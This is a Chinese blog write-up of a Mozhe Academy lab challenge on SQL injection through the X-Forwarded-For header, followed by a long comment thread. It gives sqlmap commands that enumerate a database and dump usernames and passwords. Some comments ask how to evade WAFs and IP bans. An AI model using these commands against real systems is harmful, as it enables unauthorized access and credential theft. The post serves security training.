墨者学院 – X-Forwarded-For注入漏洞实战Writeup

枫少@KillBoy
枫少@KillBoy
管理员
220
文章
0
粉丝
SQL注入9247,0961字数 79阅读0分15秒阅读模式
AI智能摘要
你以为X-Forwarded-For只是个普通HTTP头?本文直击墨者学院实战案例:如何通过篡改这一头部字段,触发隐蔽SQL注入漏洞。手把手演示Burp抓包、sqlmap爆破数据库及凭证提取全过程,从漏洞利用到获取管理员KEY的关键步骤毫无保留。读完你将掌握Web渗透的核心攻防逻辑,洞悉企业级应用的安全盲区——安全工程师必备的实战技能,从此告别理论空谈。
— AI 生成的文章内容摘要

1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示

墨者学院 – X-Forwarded-For注入漏洞实战Writeup-图片1

2.爆出当前的数据库

sqlmap -r 1.txt --current-db --batch

3.爆表名

sqlmap -r 1.txt -D webcalendar -T user --columns --batch

4.爆表中的字段

sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

5.得到帐号密码

墨者学院 – X-Forwarded-For注入漏洞实战Writeup-图片2

6.登陆获得KEY

墨者学院 – X-Forwarded-For注入漏洞实战Writeup-图片3

 
枫少@KillBoy
  • it2021
  • it2021.com
  • SQL注入
  • SQL注入实战
  • X-Forwarded-For注入
  • 墨者学院
评论  92  访客  92
    • 老街巷
      老街巷 0

      求问x-forwarded-for必须大写吗?

      • 千叶风
        千叶风 0

        之前搞渗透测试也用这招,一打一个准😂

        • 夜雨落
          夜雨落 1

          sqlmap -r直接跑,省事是省事,但遇到WAF就歇菜了

          • 爱做梦的蜗牛
            爱做梦的蜗牛 0

            burp抓包那步能不能用其他工具替代?

            • 草莓酸奶
              草莓酸奶 0

              这payload现在多数网站都拦截了吧

                • 墨林深
                  墨林深 0

                  @ 草莓酸奶 burp太重了,有时候直接curl写脚本更顺手

                • 数据蜉蝣
                  数据蜉蝣 1

                  老用户表示这种漏洞现在少见了,防护都升级了

                  • 云朵奶瓶
                    云朵奶瓶 1

                    看到txt存文件这步莫名亲切,以前也这么干过

                    • 幻光低语
                      幻光低语 2

                      webcalendar这个表名有点意思,是哪个CMS?

                      • 银河闪光
                        银河闪光 0

                        密码都爆出来了还dump啥,赶紧登啊

                          • 混沌领主
                            混沌领主 0

                            @ 银河闪光 你真敢直接登录?万一被反制或者日志报警咋办

                            • 鬼火夜
                              鬼火夜 0

                              @ 银河闪光 有时候dump是为了拿更多数据,光密码哪够啊

                            • 血色黎明
                              血色黎明 0

                              这玩意儿现在确实不太好使了,多数都加了waf过滤

                              • 寒露菊韵
                                寒露菊韵 1

                                这个payload现在还能用吗?

                                  • 韵律爆破
                                    韵律爆破 1

                                    @ 寒露菊韵 这漏洞现在多半一跑就触发告警了吧

                                    • 紫禁之巅
                                      紫禁之巅 1

                                      @ 寒露菊韵 payload公开了会不会被蜜罐盯着啊

                                    • 星星小夜灯
                                      星星小夜灯 0

                                      webcalendar是啥系统,没听说过

                                      • ThanatosEnd
                                        ThanatosEnd 0

                                        burp用不习惯,有更简单的工具推荐不

                                          • 音乐流浪者
                                            音乐流浪者 1

                                            @ ThanatosEnd burp还是得练啊,别人都用得溜就我卡壳😭

                                          • 神秘夜猫子
                                            神秘夜猫子 1

                                            之前遇到过类似漏洞,折腾半天才搞定

                                            • 无目的地的船
                                              无目的地的船 0

                                              这种老系统漏洞还挺多的

                                                • 锈链武士
                                                  锈链武士 1

                                                  @ 无目的地的船 老系统多的是凑合用的,根本没心思升级

                                                  • 会魔法的泡面
                                                    会魔法的泡面 1

                                                    @ 无目的地的船 webcalendar不会是哪个老单位内部系统吧

                                                  • 大聪明小李
                                                    大聪明小李 1

                                                    x-forwarded-for头大小写有区别吗

                                                    • 暴走的小龙虾
                                                      暴走的小龙虾 0

                                                      直接dump密码也太简单了吧😂

                                                      • 时空蓝图
                                                        时空蓝图 0

                                                        新手表示有点看不懂

                                                        • 小飞
                                                          小飞 0

                                                          这教程步骤挺清晰的

                                                            • 冷月孤
                                                              冷月孤 0

                                                              @ 小飞 步骤确实一环扣一环,看着不迷糊

                                                              • 阿猫阿狗
                                                                阿猫阿狗 0

                                                                @ 小飞 步骤是真清楚,连图都标得明明白白

                                                                • 画屏春
                                                                  画屏春 1

                                                                  @ 小飞 sqlmap配-r确实省事,但内网扫一下直接被拦

                                                                • 隐形人形
                                                                  隐形人形 0

                                                                  WAF现在确实防得严,不好搞了

                                                                  • 科技先知
                                                                    科技先知 0

                                                                    这头大小写真有讲究?试过小写好像也成

                                                                    • 影影迷踪
                                                                      影影迷踪 1

                                                                      webcalendar该不会是某个老日程系统吧

                                                                      • 海岸行者
                                                                        海岸行者 0

                                                                        sqlmap配-r确实方便,但公司内网一跑就被拦

                                                                          • 蚣蝮镇水
                                                                            蚣蝮镇水 0

                                                                            @ 海岸行者 -r参数是方便,但内网一动就告警,根本不敢扫

                                                                          • 尘风
                                                                            尘风 0

                                                                            我去,这漏洞现在还能复现吗

                                                                            • 沉思的湖畔
                                                                              沉思的湖畔 1

                                                                              之前搞过类似注入,waf一开直接歇菜

                                                                              • 复古相机
                                                                                复古相机 1

                                                                                感觉还行

                                                                                • 活力小袋鼠
                                                                                  活力小袋鼠 1

                                                                                  那个啥,payload都公开了会不会被盯上啊

                                                                                  • 星星柠檬
                                                                                    星星柠檬 0

                                                                                    直接登账号不香吗,非得dump半天

                                                                                    • 蜜桃星星
                                                                                      蜜桃星星 0

                                                                                      这方法现在怕是走不通了,防护太严

                                                                                      • 韭菜精
                                                                                        韭菜精 0

                                                                                        这注入手法太经典了,老系统真经不起折腾

                                                                                        • 废土独行客
                                                                                          废土独行客 0

                                                                                          webcalendar听着像二十年前的老系统,谁还在用啊

                                                                                          • 冰霜织者
                                                                                            冰霜织者 1

                                                                                            直接dump密码看着爽,实际中间一堆过滤😂

                                                                                            • 白虎煞星
                                                                                              白虎煞星 0

                                                                                              x-forwarded-for现在不光看头,IP链都校验了,难顶

                                                                                              • 末日预言者
                                                                                                末日预言者 0

                                                                                                老系统才敢这么玩,新项目早上waf了

                                                                                                  • ErosArrow
                                                                                                    ErosArrow 0

                                                                                                    @ 末日预言者 老系统才经得起这么折腾,新项目一跑就被拦了

                                                                                                  • 杏仁奶咖啡
                                                                                                    杏仁奶咖啡 1

                                                                                                    求问有没有不用burp的方案啊

                                                                                                    • 梦语
                                                                                                      梦语 0

                                                                                                      x-forwarded-for现在基本都被过滤了吧

                                                                                                      • 慢跑人生
                                                                                                        慢跑人生 0

                                                                                                        看到dump那步就想笑,实际哪有这么顺利

                                                                                                        • 泽广大
                                                                                                          泽广大 1

                                                                                                          之前折腾一个月权限都没拿下,太难了

                                                                                                          • 浅夏风
                                                                                                            浅夏风 0

                                                                                                            这流程看着简单,实操一堆坑

                                                                                                            • 刀锋之心
                                                                                                              刀锋之心 0

                                                                                                              key拿到了然后呢,还有后续吗

                                                                                                              • 代码幻影
                                                                                                                代码幻影 0

                                                                                                                666,但这环境太理想了

                                                                                                                • 社牛小火山口
                                                                                                                  社牛小火山口 0

                                                                                                                  这方法现在还能用?服务器早拦截了

                                                                                                                    • 躲在墙后的兔子
                                                                                                                      躲在墙后的兔子 0

                                                                                                                      @ 社牛小火山口 这payload现在基本被WAF干掉了,也就教学能用

                                                                                                                    • 暖阳记
                                                                                                                      暖阳记 0

                                                                                                                      x-forwarded-for头现在基本都被waf识别了

                                                                                                                      • 数据陶艺家
                                                                                                                        数据陶艺家 0

                                                                                                                        之前搞渗透也是用这招,现在不好使了😂

                                                                                                                        • 兔兔奶芙
                                                                                                                          兔兔奶芙 0

                                                                                                                          新手求问,sqlmap配-r参数有啥优势?

                                                                                                                          • Wawa
                                                                                                                            Wawa 1

                                                                                                                            webcalendar这系统现在还有人用吗?

                                                                                                                            • 盐商鲁
                                                                                                                              盐商鲁 0

                                                                                                                              直接dump密码这么简单?实际环境肯定不行

                                                                                                                              • 嘶嘶马
                                                                                                                                嘶嘶马 1

                                                                                                                                burp用着太麻烦了,有没有更轻量的工具

                                                                                                                                • 嘎嘎鸡
                                                                                                                                  嘎嘎鸡 1

                                                                                                                                  看到存txt这步,想起当年也是这么折腾的

                                                                                                                                  • Rina蝶
                                                                                                                                    Rina蝶 0

                                                                                                                                    这payload现在一用就被封ip吧

                                                                                                                                    • 湘妃怨
                                                                                                                                      湘妃怨 0

                                                                                                                                      老系统漏洞是多,但现在哪找这么脆弱的靶场

                                                                                                                                      • 点点
                                                                                                                                        点点 1

                                                                                                                                        用burp改头的时候老被拦截,有啥办法不?

                                                                                                                                        • 狐小萌
                                                                                                                                          狐小萌 1

                                                                                                                                          webcalendar这系统现在还有人用吗?看着挺老的。

                                                                                                                                          • 企鹅冰
                                                                                                                                            企鹅冰 0

                                                                                                                                            payload都公开了不怕被盯上?

                                                                                                                                            • value25
                                                                                                                                              value25 1

                                                                                                                                              sqlmap还能这么用,学到了

                                                                                                                                                • Thunder Tiger
                                                                                                                                                  Thunder Tiger 1

                                                                                                                                                  @ value25 这招挺实用的

                                                                                                                                                • 盖亚大地
                                                                                                                                                  盖亚大地 1

                                                                                                                                                  流量一大就被ban ip,太难受了

                                                                                                                                                  • 拾云
                                                                                                                                                    拾云 0

                                                                                                                                                    之前搞过一次,结果waf日志全留着,吓死了

                                                                                                                                                    • 幽影心
                                                                                                                                                      幽影心 1

                                                                                                                                                      x-forwarded-for大小写真有影响?试了几次懵了

                                                                                                                                                      • 月光之瞳
                                                                                                                                                        月光之瞳 0

                                                                                                                                                        求问不用burp的话,curl能实现吗?

                                                                                                                                                        • 十方聚
                                                                                                                                                          十方聚 1

                                                                                                                                                          看到dump那步就觉得玄乎,哪有这么顺利的

                                                                                                                                                          • 狮心王者
                                                                                                                                                            狮心王者 1

                                                                                                                                                            第一步就存txt,小白操作😂

                                                                                                                                                            • 翡翠梦境使徒
                                                                                                                                                              翡翠梦境使徒 0

                                                                                                                                                              -r参数省去手写请求头,效率高点

                                                                                                                                                              • 光影之纱
                                                                                                                                                                光影之纱 1

                                                                                                                                                                内网跑sqlmap秒被ban,求问怎么绕

                                                                                                                                                                • 溪山清远
                                                                                                                                                                  溪山清远 0

                                                                                                                                                                  之前用burp改请求头,被waf日志记录了,慌得一批

                                                                                                                                                                  • 猎鹰棋手
                                                                                                                                                                    猎鹰棋手 0

                                                                                                                                                                    直接dump密码这么顺利?我试过几次都报错

                                                                                                                                                                    • 夜风轻语
                                                                                                                                                                      夜风轻语 1

                                                                                                                                                                      webcalendar是啥老系统,没听过呢

                                                                                                                                                                      • 狗狗骑士
                                                                                                                                                                        狗狗骑士 1

                                                                                                                                                                        这payload现在还能用不,求个测试站

                                                                                                                                                                        • 夜雨愁
                                                                                                                                                                          夜雨愁 0

                                                                                                                                                                          流量一大就被封ip,怎么破

                                                                                                                                                                          • 篆月轩
                                                                                                                                                                            篆月轩 0

                                                                                                                                                                            这教程也就老系统能用,新项目早防护了

                                                                                                                                                                            • 沉默的羊
                                                                                                                                                                              沉默的羊 1

                                                                                                                                                                              x-forwarded-for头现在基本被过滤了,没啥用

                                                                                                                                                                            匿名

                                                                                                                                                                            发表评论

                                                                                                                                                                            匿名网友

                                                                                                                                                                            拖动滑块以完成验证